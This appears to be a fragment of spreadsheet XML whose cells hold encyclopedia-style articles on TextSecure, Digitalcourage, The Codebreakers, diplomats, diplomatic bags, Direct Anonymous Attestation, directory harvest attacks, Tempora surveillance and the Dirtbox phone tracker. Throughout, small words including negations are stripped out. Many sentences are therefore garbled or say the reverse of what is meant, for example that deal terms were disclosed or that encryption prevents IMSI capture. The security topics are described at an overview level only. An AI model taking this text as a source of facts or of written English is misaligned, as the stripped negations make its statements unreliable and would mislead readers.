    <t>textsecure encrypted messaging application android developed 2010 2015. predecessor signal first application signal protocol, since implemented whatsapp applications. textsecure used end-to-end encryption secure transmission text messages, group messages, attachments media messages textsecure users. textsecure first developed whisper systems, later acqui-hired twitter. application's source code released free open-source software license. 2013, textsecure's development picked independent group called open whisper systems, merged encrypted voice calling application called redphone renamed product signal. history whisper systems twitter (2010–2011) textsecure started application sending receiving encrypted messages. beta version first launched 2010, whisper systems, startup company co-founded security researcher moxie marlinspike roboticist stuart anderson. addition launching textsecure, whisper systems produced firewall, tools encrypting forms data, redphone, application provided encrypted voice calls. proprietary enterprise mobile security software. november 2011, whisper systems announced acquired twitter. financial terms deal disclosed either company. acquisition done "primarily marlinspike could help then-startup improve security". shortly acquisition, whisper systems' redphone service made unavailable. some criticized removal, arguing software "specifically targeted help] people repressive regimes" left people like egyptians dangerous position" events 2011 egyptian revolution.twitter released textsecure free open-source software gplv3 license december 2011. redphone also released license july 2012. marlinspike later left twitter founded open whisper systems collaborative open source project continued development textsecure redphone. open whisper systems (2013–2015) open whisper systems' website launched january 2013. open whisper systems started working bring textsecure march 2013.in february 2014, open whisper systems introduced second version textsecure protocol (now signal protocol), added group chat push messaging capabilities textsecure. toward july 2014, open whisper systems announced plans unify redphone textsecure applications signal. this announcement coincided initial release signal redphone counterpart ios. developers said next steps would provide textsecure instant messaging capabilities ios, unify redphone textsecure applications android, launch client. signal first enable easy, strongly encrypted voice calls free.textsecure compatibility added application march 2015. later month, open whisper systems ended support sending receiving encrypted sms/mms messages android. from version 2.7.0 onward, textsecure supported sending receiving encrypted messages data channel. reasons included: complications encryption procedure: users needed manually initiate "key exchange", required full round trip messages could exchanged. addition this, users could always sure whether receiver could receive encrypted sms/mms messages not. compatibility issues ios: possible send receive encrypted sms/mms messages lack apis. large amounts metadata inevitably arise uncontrollable using sms/mms transportation messages. focus software development: maintaining sms/mms encryption dealing edge cases took valuable resources inhibited development software.open whisper systems' abandonment sms/mms encryption prompted users create fork named silence (initially called smssecure) meant solely encryption messages.in november 2015, redphone application merged textsecure renamed signal android. features textsecure allowed users send encrypted text messages, audio messages, photos, videos, contact information, wide selection emoticons data connection (e.g. wi-fi, textsecure users smartphones running android. textsecure also allowed users exchange unencrypted messages people textsecure.messages sent textsecure textsecure users automatically end-to-end encrypted, meant could read intended recipients. keys used encrypt user's messages stored device alone. user interface, encrypted messages denoted lock icon. textsecure allowed user passphrase encrypted local message database user's encryption keys. this encrypt user's contact database message timestamps. user could define time period application "forgot" passphrase, providing additional protection mechanism case phone lost stolen.textsecure built-in function verifying user communicating right person man-in-the-middle attack occurred. this verification could done comparing fingerprints form codes) person. application would also notify user correspondent's fingerprint changed.textsecure allowed users chat person time. group chats automatically end-to-end encrypted held available data connection participants registered textsecure users. users could create groups title avatar icon, friends, join leave groups, exchange messages/media, encryption properties pairwise textsecure chats provided. servers access group metadata lists group members, group title, group avatar icon.the application could also function drop-in replacement android's native messaging application could fall back sending unencrypted messages. limitations textsecure required user phone number verification. number device's card; could also voip number landline long user could receive verification code separate device set-up software. number could registered device time. official textsecure client required google play services dependent google's push messaging framework. from february 2014 march 2015, textsecure used transport message delivery data channel. from march 2015 forward, textsecure's message delivery done open whisper systems client relied wakeup event. architecture encryption protocol textsecure first application signal protocol (then called textsecure protocol), since implemented whatsapp, facebook messenger, google allo, encrypting conversations "more billion people worldwide". protocol combines double ratchet algorithm, prekeys, 3-dh handshake. uses curve25519, aes-256, hmac-sha256 primitives.the protocol provides confidentiality, integrity, authentication, participant consistency, destination validation, forward secrecy, backward secrecy (aka future secrecy), causality preservation, message unlinkability, message repudiation, participation repudiation, asynchronicity. provide anonymity preservation, requires servers relaying messages storing public material.the group chat protocol combination pairwise double ratchet multicast encryption. addition properties provided one-to-one protocol, group chat protocol provides speaker consistency, out-of-order resilience, dropped message resilience, computational equality, trust equality, subgroup messaging, well contractible expandable membership. servers client-server communications protected tls. once server removed layer encryption, message contained either phone number sender receiver plaintext. this metadata could theory allowed creation detailed overview users communicated". open whisper systems asserted servers keep metadata. order determine contacts also textsecure users, cryptographic hashes user's contact numbers periodically transmitted server. server checked matched sha256 hashes registered users told client matches found. moxie marlinspike wrote easy calculate possible hash inputs hash outputs reverse mapping limited preimage space (the possible hash inputs) phone numbers, "practical privacy preserving contact discovery remains unsolved problem".the group messaging mechanism designed servers access membership list, group title, group icon. instead, creation, updating, joining, leaving groups done clients, delivered pairwise messages participants one-to-one messages delivered.the server architecture partially decentralized december 2013 february 2016. december 2013, announced messaging protocol used textsecure successfully integrated android-based open-source operating system cyanogenmod. from cyanogenmod 11.0 onward, client logic contained system called whisperpush. according open whisper systems, cyanogen team textsecure server whisperpush clients, federated open whisper systems' textsecure server, clients could exchange messages each-other seamlessly. cyanogenmod team discontinued whisperpush february 2016, recommended users switch signal. licensing complete source code textsecure available github free software license. software handled message routing textsecure data channel also open source. distribution textsecure officially distributed google play. october 2015, textsecure installed times google play.textsecure briefly included f-droid software repository 2012, removed developer's request unverified build exceptionally date. open whisper systems subsequently said support applications distributed f-droid provide timely software updates, relies centralized trust model necessitates allowing installation apps unknown sources harms android's security average users. audits october 2013, isec partners published blog post said audited several projects supported open technology fund past year, including textsecure.in october 2014, researchers ruhr university bochum published analysis textsecure encryption protocol. among findings, presented unknown key-share attack protocol, general, found encrypted chat client secure. reception former contractor edward snowden endorsed textsecure multiple occasions. keynote speech sxsw march 2014, praised textsecure ease-of-use. during interview yorker october 2014, recommended using "anything moxie marlinspike open whisper systems". asked encrypted messaging apps reddit 2015, recommended textsecure.in october 2014, electronic frontier foundation (eff) included textsecure updated surveillance self-defense guide. november 2014, textsecure received perfect score eff's secure messaging scorecard. textsecure received points communications encrypted transit, communications encrypted keys providers access (end-to-end encryption), making possible users independently verify correspondent's identities, past communications secure keys stolen (forward secrecy), code open independent review (open-source), security designs well-documented, recent independent security audits. time, "chatsecure orbot", cryptocat, "signal redphone", pidgin (with otr), silent phone, silent text, telegram's optional secret chats also received seven seven points scorecard. developers funding textsecure developed nonprofit software group called open whisper systems. group funded combination donations grants, products published free open-source software. october 2016, project received unknown amount donations individual sponsors freedom press foundation. open whisper systems received grants knight foundation, shuttleworth foundation, open technology fund, u.s. government funded program also supported privacy projects like anonymity software encrypted instant messaging cryptocat. also comparison instant messaging clients internet privacy secure instant messaging references literature external links textsecure github open whisper systems. developers' homepage.</t>
  </si>
  <si>
    <t>Digital signature</t>
  </si>
  <si>
    <t>Digitalcourage</t>
  </si>
  <si>
    <t>digitalcourage known november 2012 foebud (verein förderung öffentlichen bewegten unbewegten datenverkehrs) german privacy digital rights organisation. under motif preserving world worth living digital age", digitalcourage campaigns civil human rights, consumer protection, privacy, freedom information related issues. group links organisations german working group data retention (arbeitskreis vorratsdatenspeicherung) chaos computer club, member umbrella organisation european digital rights. campaigns group known organising german brother awards. these negative awards recognise “companies, institutions persons prominent sustained invade people's privacy leak (personal) data third parties”. annual award ceremony featuring “winners” various categories organised digitalcourage.to highlight privacy implications bonus customer “loyalty” cards, organisation issued so-called “privacy card”. design mirrored popular “payback” card bore number regular card registered foebud's name. users collected bonus points behalf foebud, sharing customer profile. after 2,000 cards used, payback disabled foebud's registration card contract. since october 2003, digitalcourage active issue rfid founded campaign called “stoprfid” accompany introduction technology critical perspective. foebud organised supported various complaints german constitutional court disputed laws, data retention, central database employees’ wages, internet blocking. foebud co-founder german working group data retention supports annual demonstration focusing security measures restrict civil liberties, name “freedom fear”. response threat anonymity posed data retention, digitalcourage running exit node rented server. organisation also makes sells privacydongle, drive used browser portable app, i.e. without installing windows macos. part campaign abandoned introduce internet blocking (zugangserschwerungsgesetz), would implemented poisoning, digitalcourage operating public "anti-censorship" server. since 2018, address 46.182.19.48 dns2.digitalcourage.de). since december 2020, provided third server address 5.9.164.112 dns3.digitalcourage.de, port 853) exclusively encrypted/private according standard. earlier activities: mailbox systems 1987, mailbox (bulletin board) system named bionic created operated foebud members. objectives mailbox without censorship deny unlimited rights system's administrators, regulating conflicts community instead. bionic became birthplace several early mailbox networks. mailbox linked networks early "home net" many groupings left "alternative" political spectrum. eric bachman, bionic user foebud member, instigated zamir transnational network 1991 response yugoslav wars, beginning time. means "for peace", network served low-cost simple link peace groups region, form nonviolent resistance. bionic software proved useful limited resources available; e.g. sarajevo, 1,500 users served using telephone lines. other mailboxes existed ljubljana (slovenia), zagreb (croatia), belgrade (serbia), tuzla (bosnia) priština (kosovo). origins name foebud co-founders rena tangens padeluun active punk rock media scenes established gallery named d’ameublement bielefeld 1984. gallery hosted chaos computer club exhibit 1985, group local enthusiasts then-current forms computer communication, hacking social philosophical matters formed around gallery. this monthly event called "public domain" meeting practical research talk discussion series.eventually, association charity status formed. organisation's full name, "association promotion public mobile immobile data exchange" (verein förderung öffentlichen bewegten unbewegten datenverkehrs), acronym foebud conceived parody language used telecommunications operator, deutsche bundespost, state authority monopolist telephone postal communications. telecommunications equipment heavily regulated german network, devices available often names acronyms appeared bureaucratic cumbersome. foebud's activities reputation spread outside hacker scene historic background largely lost, name often perceived obscure.as organisation nearing 25th anniversary, perceived name foebud turned in-joke obstacle group's publicity. name sought, eventually "digitalcourage" chosen announced november 2012. recognition zamir network chosen award named "sense/information" (sinnformation) green parliamentary party german parliament (bundestag) 1998. foebud received nationally reputed award, theodor heuss medal, civil rights activities 2008. sources</t>
  </si>
  <si>
    <t>The Codebreakers</t>
  </si>
  <si>
    <t>codebreakers story secret writing (isbn 0-684-83130-9) book david kahn, published 1967, comprehensively chronicling history cryptography ancient egypt time writing. united states government attempted book altered publication, succeeded part. overview bradford hardie iii, american cryptographer world contributed insider information, german translations original documents, intimate real-time operational explanations codebreakers.the codebreakers widely regarded best account history cryptography publication. william crowell, former deputy director national security agency, quoted newsday magazine: "before (kahn) came along, best could explanatory book usually technical terribly dull."the puzzle palace (1982), written james bamford, gives history writing publication codebreakers. kahn, journalist, contracted write book cryptology 1961. began writing part-time, quit work full-time. book include information and, according bamford, agency attempted stop publication. considered various options, including writing negative review kahn's work published press discredit him.a committee united states intelligence board concluded book possibly valuable support foreign comsec authorities" recommended "further low-key actions possible, short legal action, discourage kahn prospective publishers". kahn's publisher, macmillan sons, handed manuscript government review without kahn's permission march 1966. kahn macmillan eventually agreed remove material manuscript, particularly concerning relationship counterpart united kingdom, gchq.the book finishes chapter seti. because year publication, book cover history concerning breaking german enigma machine, became public knowledge 1970s. hence, much said alan turing. also cover advent strong cryptography public domain, beginning invention public cryptography specification data encryption standard mid-1970s. book republished 1996, edition included additional chapter briefly covering events since original publication. also books cryptography: works cover later history detail. references bibliography secret words; codebreakers. story secret writing. david kahn. york times book review, 1968. br10</t>
  </si>
  <si>
    <t>Digix</t>
  </si>
  <si>
    <t>Diplomat</t>
  </si>
  <si>
    <t>diplomat (from ancient greek: δίπλωμα; romanized diploma) person appointed state intergovernmental institution united nations european union conduct diplomacy states international organizations. main functions diplomats are: representation protection interests nationals sending state; initiation facilitation strategic agreements; treaties conventions; promotion information; trade commerce; technology; friendly relations. seasoned diplomats international repute used international organizations (for example, united nations, world's largest diplomatic forum) well multinational companies experience management negotiating skills. diplomats members foreign services diplomatic corps various nations world. sending state required consent receiving state person proposed serve diplomatic positions ambassador, also referred head mission. receiving state proposed diplomat accept diplomat refuse accept diplomat without provide reasons refusal acceptance person. while head mission member diplomatic staff already duty receiving state, receiving state still decide anytime person longer wanted state considered persona grata. when happens, sending state discharge person.diplomats oldest form foreign policy institutions state, predating centuries foreign ministers ministerial offices. they usually diplomatic immunity, official travels usually diplomatic passport officials, united nations laissez-passer. terminology regular permanent diplomatic representation began states 15th-century italy. however terms "diplomacy" "diplomat" appeared french revolution. "diplomat" derived greek διπλωμάτης (diplōmátēs), holder diploma, referring diplomats' documents accreditation sovereign.diplomats historians often refer foreign ministry address: ballhausplatz (vienna), quai d’orsay (paris), wilhelmstraße (berlin); itamaraty (from former itamaraty palace janeiro, transferred brasília since 1970) foggy bottom (washington). imperial russia 1917 choristers' bridge petersburg). italian ministry called "the consulta". career diplomats political appointees though person appointed state's national government conduct said state's relations states international organizations, number states maintain institutionalized group career diplomats—that public servants steady professional connection country's foreign ministry. term career diplomat used worldwide opposition political appointees (that people professional backgrounds equally designated official government diplomats abroad). while officially posted embassy delegation foreign country accredited international organization, career diplomats political appointees enjoy diplomatic immunities, well united nations officials. ceremonial heads state commonly diplomats behalf nation, usually following instructions head government. sasson sofer argues that, "the ideal diplomat, nature mission, destined clash expedient needs country's politics." hand professional politicians often ridicule diplomats. president john kennedy often denigrated career diplomats "weak effeminate" moved foreign policy decisions hands. diplomatic ranks every diplomat, posted abroad, classified ranks diplomats (secretary, counselor, minister, ambassador, envoy, chargé d'affaires) regulated international (namely, vienna convention diplomatic relations 1961). diplomats contrasted consuls help businesspeople, military attachés. they represent foreign ministry branches government, lack diplomat's role dealing foreign policy highest level. function diplomats posts collect report information could affect national interests, often advice home-country government respond. then, policy response decided home country's capital, posts bear major responsibility implementing diplomats conveying, persuasive possible, views home government governments accredited and, trying convince governments ways suit home-country interests. way, diplomats part beginning loop continuous process foreign policy develops. general, become harder diplomats autonomously. diplomats secure communication systems, emails, mobile telephones allow reaching even reclusive head mission. this technology also gives diplomats capacity immediate input policy-making processes home capital. secure email transformed contact diplomats ministry. less likely leak, enables personal contact formal cablegram, wide distribution impersonal style. advocacy home country usually send instructions diplomatic post foreign policy goals pursue, decisions tactics needs influenced, best persuade them, potential allies adversaries, done diplomats overseas make. operation, intelligence, integrity, cultural understanding, energy individual diplomats become critical. competent, developed relationships grounded trust mutual understanding influential members country accredited. they worked hard understand motives, thought patterns culture side. negotiation diplomat excellent negotiator but, all, catalyst peace understanding people. diplomat's principal role foster peaceful relations states. this role takes heightened importance breaks out. negotiation must necessarily continue within significantly altered contexts. training most career diplomats university degrees international relations, political science, history, economics, law. "emotional intelligence" recently become component many foreign service training programs. status public image diplomats generally considered members exclusive prestigious profession. public image diplomats described caricature pinstriped gliding around never-ending global cocktail party". burton noted "despite absence specific professional training, diplomacy high professional status, perhaps degree secrecy mystery practitioners self-consciously promote." state supports high status, privileges, self-esteem diplomats order support international status position. high regard diplomats also countries' conspicuous selection diplomats, regard professionalism ability behave according certain etiquette, order effectively promote interests. also, international grants diplomats extensive privileges immunities, distinguishes diplomat status ordinary citizen. psychology loyalty while posted overseas, danger diplomats become disconnected country culture. harold nicolson acknowledged diplomats become "denationalised, internationalised therefore dehydrated, elegant empty husk". nicolson also claimed personal motives often influenced diplomatic pursuit national interest. example, wrote: "nobody actually watched statesmen dealing real idea immense part played human affairs unavowable often unrecognisable causes lassitude, affability, personal affection dislike, misunderstanding, deafness incomplete command foreign language, vanity, social engagements, interruptions momentary health."to prevent disconnection apathy state, many foreign services mandate employees return home countries period serving abroad. international diplomats diplomats started celebrating international diplomats october since 2017. idea celebrating international diplomats united nations founded proposed indian diplomat abhay kumar mark occasion diplomacy becoming principal means resolving disputes. also batman rapist unidentified english serial rapist believed remained unapprehended diplomat references further reading anderson, matthew rise modern diplomacy, 1450–1919 (1993). black, jeremy. history diplomacy chicago press, 2010) isbn 978-1-86189-696-4 berridge, diplomacy: theory practice, edition, palgrave, basingstoke, 2005, isbn 1-4039-9311-4 callieres, francois practice diplomacy (1919). online carta, caterina. european union diplomatic service: ideas, preferences identities (routledge, 2013). cornut, jérémie. diplomat abroad: diplomatic practice embassies." cooperation conflict 50.3 (2015): 385-401. craig, gordon "the professional diplomat problems, 1919–1939." world politics (1952): 145-158. cunningham, george. journey become diplomat: with guide careers world affairs (fpa global vision books, 2005), isbn 0-87124-212-5 wicquefort, abraham (2010)[1716]. embassador [sic] functions. isbn 9781140831136. oclc 1227564311 (original). dorman, shawn, inside u.s. embassy: foreign service works america (2nd american foreign service association, 2003), isbn 0-9649488-2-6 jones, ray. "the social structure british diplomatic service, 1815-1914." histoire sociale/social history 14.27 (1981). online nicolson, harold george. evolution diplomatic method (1977) rana, kishan jovan kurbalija, eds. foreign ministries: managing diplomatic networks optimizing value diplofoundation, 2007, isbn 978-99932-53-16-7 rana, kishan 21st century ambassador: plenipotentiary chief executive (diplofoundation, 2004), isbn 99909-55-18-2 satow, ernest. guide diplomatic practice (longmans, green 1917). standard reference work used many embassies across world (though british ones). fifth edition (1998). isbn 0-582-50109-1. online sofer, sasson. "being ‘pathetic hero’ international politics: diplomat historical actor." diplomacy statecraft 12.1 (2001): 107-112. sofer, sasson. "the diplomat stranger." diplomacy statecraft (1997): 179-186. stevenson, david. chapter "the diplomats" winter, cambridge history first world war: volume state (2014). volume 66–90. wesslau, fredrik (2013). political adviser's handbook. isbn 978-91-979688-7-4. wiseman, geoffrey. "expertise politics ministries foreign affairs: politician-diplomat nexus." ministries foreign affairs world (brill nijhoff, 2022) 119-149. external links media related diplomats wikimedia commons</t>
  </si>
  <si>
    <t>Diplomatic bag</t>
  </si>
  <si>
    <t>diplomatic bag, also known diplomatic pouch, container certain legal protections used carrying official correspondence items diplomatic mission home government diplomatic, consular, otherwise official entity. physical concept "diplomatic bag" flexible take many forms (e.g., cardboard box, briefcase, duffel bag, large suitcase, crate even shipping container).additionally, diplomatic usually form lock and/or tamper-evident seal attached deter detect interference unauthorized third parties. important point long externally marked show status, "bag" diplomatic immunity search seizure, codified article 1961 vienna convention diplomatic relations. contain articles intended official use, though numerous cases privileges diplomatic used facilitate smuggling. bags often escorted diplomatic courier, similarly immune arrest detention. noteworthy shipments during world winston churchill reportedly received shipments cuban cigars method. triplex british espionage operation world involved secretly copying contents diplomatic pouches neutral countries. 1964, moroccan-born israeli double agent named mordechai louk drugged, bound, placed diplomatic mailing crate egyptian embassy rome, rescued italian authorities. sealed "had almost certainly used human cargo," including possibly egyptian military official defected italy several years disappeared without trace reappearing egyptian custody facing trial. canadian government sent canadian passports material diplomatic tehran assist exfiltration american diplomats evaded capture seizure united states embassy. during 1982 falklands war, argentine government used diplomatic smuggle several limpet mines embassy spain, used covert operation algeciras, argentine agents blow british warship royal navy dockyard gibraltar. plot uncovered stopped spanish police explosives could set. 1984 dikko affair, former nigerian government minister, umaru dikko, kidnapped placed shipping crate attempt transport united kingdom back nigeria trial. however, marked diplomatic bag, allowed british customs open 1984, sterling submachine used kill yvonne fletcher inside libyan embassy london smuggled diplomatic bags. march 2000, zimbabwe became object international political attention opened british diplomatic shipment. 2008, replacement pump toilet international space station sent diplomatic pouch russia united states arrive liftoff next shuttle mission. 2012, kilogram shipment cocaine sent united nations york disguised diplomatic pouch. january 2012, italy detected kilograms cocaine smuggled diplomatic pouch ecuador, arresting five. ecuador insisted inspected shipment drugs foreign ministry sent milan. november 2013, government alleged british diplomatic opened guardia civil gibraltar-spanish border, sparking formal diplomatic protest. spanish government responded bag, transported governor gibraltar courier company, contained mailbag held packages, meet criteria transit diplomatic mission home government. july 2020, indian customs department detected kilograms gold smuggled concealed diplomatic consignment united arab emirates, seized thiruvananthapuram airport kerala indian customs department. india's national investigation agency revealed former local consulate employees involved gold smuggling. also military mail diplomatic cable references external links ediplomat.com: glossary diplomatic terms thing diplomatic pouch?". straight dope. december 2005. retrieved september 2012. article extensive detailed references.</t>
  </si>
  <si>
    <t>Direct Anonymous Attestation</t>
  </si>
  <si>
    <t>direct anonymous attestation (daa) cryptographic primitive enables remote authentication trusted computer whilst preserving privacy platform's user. protocol adopted trusted computing group (tcg) latest version trusted platform module (tpm) specification address privacy concerns (see also loss internet anonymity). iso/iec 20008 specifies daa, well, intel's enhanced privacy (epid) implementation microprocessors available licensing rand-z along open source sdk. historical perspective principle privacy issue could resolved using standard signature scheme public encryption) single pair. manufacturers would embed private every produced public would published certificate. signatures produced must originated private key, nature technology, since tpms private indistinguishable ensuring user's privacy. this rather naive solution relies upon assumption exists global secret. needs look precedent content scramble system (css), encryption system dvds, assumption fundamentally flawed. furthermore, approach fails realize secondary goal: ability detect rogue tpms. rogue compromised secrets extracted. solution first adopted (tpm specification v1.1) required trusted third-party, namely privacy certificate authority (privacy ca). each embedded pair called endorsement (ek) privacy assumed know. order attest generates second pair called attestation identity (aik). sends public aik, signed privacy checks validity issues certificate aik. (for work, either privacy must know tpm's public priori, tpm's manufacturer must provided endorsement certificate.) host/tpm able authenticate respect certificate. this approach permits possibilities detecting rogue tpms: firstly privacy maintain list tpms identified known rogue reject requests them, secondly privacy receives many requests particular reject blocklist tpms number permitted requests subject risk management exercise. this solution problematic since privacy must take part every transaction thus must provide high availability whilst remaining secure. furthermore, privacy requirements violated privacy verifier collude. although latter issue probably resolved using blind signatures, first remains. epid solution embeds private microprocessor manufactured, inherently distributes physical device shipment, provisioned ready power-on. overview protocol based three entities different steps. entities member (tpm platform epid-enabled microprocessor), issuer verifier. issuer charged verify platform join step issue credential platform. platform (member) uses credential verifier sign step. through zero-knowledge proof verifier verify credential without attempting violate platform's privacy. protocol also supports blocklisting capability verifiers identify attestations tpms compromised. privacy properties protocol allows differing degrees privacy. interactions always anonymous, member/verifier negotiate whether verifier able link transactions. this would allow user profiling and/or rejection requests originating host made many requests. member verifier also elect reveal additional information accomplish non-anonymous interactions (just choose tell stranger full name, not). thus, known identity built anonymous start. (contrast with: start known identity, never prove un-know identity regress anonymity.) implementations attacks first direct anonymous attestation scheme brickell, camenisch, chen; scheme proved insecure required fix. brickell, chen, improved efficiency first scheme using symmetric pairings, rather rsa. chen, morrissey, smart attempted improve efficiency switching symmetric asymmetric setting; unfortunately, asymmetric scheme also insecure. chen, page, smart proposed elliptic curve cryptography scheme using barreto–naehrig curves. this scheme implemented epid standard. recommended tpms general required tpms conform client profile. addition, intel epid implementation iso/iec 20008 available open source used members verifiers attestation. since attestation methods identical epid 2.0, work underway make iso/iec 20008 attestation read consistently spec level. also cryptographic protocol digital credential trusted platform module enhanced privacy privacy enhancing technologies references external links brickell, camenisch, chen: direct anonymous attestation. proceedings 11th conference computer communications security, press, 2004. (pdf) brickell, camenisch, chen: direct anonymous attestation ([1]) interdomain user authentication privacy andreas pashalidis section</t>
  </si>
  <si>
    <t>Directory harvest attack</t>
  </si>
  <si>
    <t>directory harvest attack (dha) technique used spammers attempt find valid/existent e-mail addresses domain using brute force. attack usually carried standard dictionary attack, valid e-mail addresses found brute force guessing valid e-mail addresses domain using different permutations common usernames. these attacks effective finding e-mail addresses companies since likely standard format official e-mail aliases (i.e. jdoe@example.domain, johnd@example.domain, johndoe@example.domain). there main techniques generating addresses targets. first, spammer creates list possible combinations letters numbers maximum length appends domain name. this would described standard brute force attack. this technique would impractical usernames longer characters. example, would (nearly trillion) e-mail addresses exhaust 8-character sequences. other, targeted technique, create list combines common first name surnames initials example above). this would considered standard dictionary attack guessing usernames e-mail addresses. success directory harvest attack relies recipient e-mail server rejecting e-mail sent invalid recipient e-mail addresses simple mail transfer protocol (smtp) session. addresses email accepted considered valid added spammer's list (which commonly sold spammers). although attack could also rely delivery status notifications (dsns) sent sender address notify delivery failures, directory harvest attacks likely valid sender e-mail address. actual e-mail message generated recipient addresses usually short random phrase "hello", trigger spam filter. actual content advertised sent later campaign valid email addresses. theory spammers also dhas disseminate spam, collect email addresses later spam campaign. using method way, similar paper-based leaflet drop, sender achieves goal based sheer volume, accuracy delivery. using method, message would likely contain content spammer advertising, short random phrase. references definition postini.com major e-mail services provider.</t>
  </si>
  <si>
    <t>Tempora</t>
  </si>
  <si>
    <t>tempora codeword formerly-secret computer system used british government communications headquarters (gchq). this system used buffer internet communications extracted fibre-optic cables, processed searched later time. tested 2008 became operational late 2011.tempora uses intercepts fibre-optic cables serve backbone internet gain access large amounts internet users' personal data, without individual suspicion targeting. intercepts placed united kingdom overseas, knowledge companies owning either cables landing stations.the existence tempora revealed edward snowden, former american intelligence contractor leaked information program former guardian journalist glenn greenwald 2013 part revelations government-sponsored mass surveillance programs. documents snowden acquired showed data collected tempora program shared national security agency united states. operation according edward snowden, tempora principal components called "mastering internet" (mti) "global telecoms exploitation" (gte). claimed intended collate online telephone traffic. this contradicts original documents, tempora internet traffic, like xkeyscore system nsa, components incorporated tempora.it alleged gchq produces larger amounts metadata nsa. 2012, gchq analysts analysts assigned sort data.the guardian claims distinction made gathering data public citizens targeted suspects. tempora said include recordings telephone calls, content email messages, facebook entries personal internet history users. snowden said tempora "it's u.s. problem. u.k. huge fight...they [gchq] worse u.s."claims exist tempora possible secret agreements commercial companies, described snowden's leaked documents "intercept partners". some companies alleged paid co-operation. snowden also alleged gchq staff urged disguise origin material reports fear role companies intercept partners would cause "high-level political fallout". companies forbidden reveal existence warrants compelling allow gchq access cables. companies fail comply compelled so.lawyers gchq said would impossible list total number people targeted tempora "this would infinite list manage".gchq three-year trial gchq bude cornwall. gchq probes attached internet links mid-2011; probe carried gigabits data second. analysts brought trials, tempora launched 2011, data shared nsa. ongoing technical work expanding gchq's capacity collect data super cables carry data gigabits second. data preserved three days metadata kept thirty days.tempora comprises different components, like actual access points fibre-optic cables, sanitisation program codenamed pokerface, xkeyscore system developed nsa, massive volume reduction (mvr) capability.in 2012, gchq tempora systems installed following locations: gigabit/second cables processing centre gigabit/second cables processing centre gigabit/second cables rpc1 processing centre reactions defence officials issued confidential da-notice media asking media refrain running stories related surveillance leaks including prism program british involvement therein.the army restricted employees' access guardian website since beginning leaks prism tempora order prevent unauthorized disclosure classified information."german federal minister justice sabine leutheusser-schnarrenberger tweeted considered program "alptraum" ("nightmare") demanded european union institutions investigate matter.jan philipp albrecht, german member european parliament spokesperson justice home affairs greens/efa parliamentary group, called infringement procedure united kingdom violated obligations relating protection individuals regard processing personal data article treaties european union.in september 2018, european court human rights ruled uk’s mass data interception retention programmes, including tempora, "was unlawful incompatible conditions necessary democratic society". also indect european union project karma police (surveillance program) list government surveillance projects mass surveillance united kingdom muscular signals intelligence tempora mutantur latin adage ukusa sigint agreement catalog communications assistance enforcement (calea) global surveillance disclosures (2013–present) website visitor tracking browsing history analytics mining surveillance internet privacy references external links tempora "the world's largest xkeyscore" available qualified users, released spiegel june 2014 macaskill, ewen; borger, julian; hopkins, nick; davies, nick; ball, james june 2013). "how gchq's internet surveillance work?". guardian. london. ball, james; harding, luke; garside, juliette august 2013). vodafone among telecoms companies passing details gchq". guardian. retrieved november 2013. schneier, bruce june 2014). "gchq intercept sites oman". schneier security. retrieved june 2014.</t>
  </si>
  <si>
    <t>Dirtbox (cell phone)</t>
  </si>
  <si>
    <t>dirtbox box) cell site simulator, phone device mimicking cell phone tower, creates signal strong enough cause nearby dormant mobile phones switch mounted aircraft, used united states marshals service locate collect information cell phones believed connected criminal activity. also used phones. device's name comes company developed digital receiver technology, inc. (drt), owned boeing company. boeing describes device hybrid "jamming, managed access detection".: similar device smaller range, controversial stingray phone tracker, widely used u.s. federal entities, including federal bureau investigation (fbi). history known first manufactured dirtbox. company publicly advertise stating site: "due sensitive nature work, unable publicly advertise many products." wall street journal wrote u.s. marshals service program utilizing device "fully matured 2007". boeing bought 2008.similar devices harris corporation, like stingray phone tracker, sold around time. since 2008, airborne mounting cell phone surveillance said cost $9,000.on june 2010, boeing company asked national telecommunications information administration advise united states congress "... communications 1934 modified allow prison officials state local enforcement appropriate cell phone management", suggested special weapons tactics (swat) teams paramilitary tactical units could devices control wireless communications raids.: chicago police department bought dirtboxes eavesdrop demonstrators 2012 nato summit, used 2014 black lives matter demonstrations. 2015, became known angeles police department purchased devices. technology device described 2-square-foot (0.19 size. mimic cell phone tower, utilizes imsi-catcher (international mobile subscriber identity) technology, phone services identify individual subscribers. emits pilot signal made appear stronger nearest cell tower, causing phones within range broadcast imsi numbers electronic serial numbers (esn). encryption prevent process; devices retrieve phone's encryption session keys less second, success rates 50–75% "real world conditions".an aircraft-mounted device locate phone within feet, another source claims triangulating flights, dirtbox pinpoint phone's location feet.the dirtbox hybrid detection, managed access jamming technologies. according wall street journal, "people knowledge program" determine phones belong suspects non-suspects, "cell phones interest, belonging prison personnel commercial users area, returned local network.": also selectively interrupt prevent calls certain phones, used block unauthorized phone prison inmates.: also retrieve data phones. according boeing,: technology "unobtrusive legitimate wireless communications", bypasses phone companies operations. agency enforcement november 2014, u.s. marshals service technical operations group used device, fixed manned airplanes, track fugitives, said deploy "targets requested parts justice program". devices operated least five u.s. airports, "covering u.s. population". unclear whether u.s. marshals service requests court orders devices.the marshals service used dirtboxes mexican drug war, tracking fugitives coordination mexico's naval infantry force flights guatemala.dirtboxes also used united states special operations command, drug enforcement administration, u.s. customs border protection. according procurement documents, u.s. navy bought dirtboxes mount drones naval weapons station china lake, research development facility southern california. pentagon washington headquarters services bought dirtboxes 2011. signal intelligence based references "drtbox" nsa's boundless informant screenshots leaked edward snowden, dirtboxes probably used nsa. 2013, french newspaper lemonde wrote, "thanks drtbox, 62.5 million phone data collected france". united states naval special warfare development group's group bought digital receiver technology 1301b system april 2007 $25,000, according united states government procurement site. u.s. regulation national telecommunications information administration (ntia) known dirtboxes since least 2010. 2014, united states department justice refused confirm deny government agencies used them, official said, would utterly false conflate law-enforcement program collection bulk telephone records national security agency". federal communications commission, responsible licensing regulating cell-service providers, aware dirtbox activity prior wall street journal exposé.in january 2015, senate judiciary committee asked department justice department homeland security enforcement agencies used drtboxes, specify legal processes policies existed protect privacy whose information collected. criticism privacy advocates, including u.s. rep. alan grayson (d-florida), criticized dirtbox violation fourth amendment united states constitution. brian owsley, professor indiana institute technology former united states magistrate, said devices legally, think government would need obtain search warrant based probable cause consistent fourth amendment".the guardian quoted michael german, professor york university school former agent, saying: "the overriding problem excessive secrecy hides government’s ever-expanding surveillance programs public accountability."senator edward markey (d-massachusetts) former senator franken (d-minnesota) warned americans' privacy rights must assured. also cellphone surveillance signals intelligence stingray phone tracker references external links official website</t>
  </si>
  <si>
    <t>Discriminant Book</t>
  </si>
  <si>
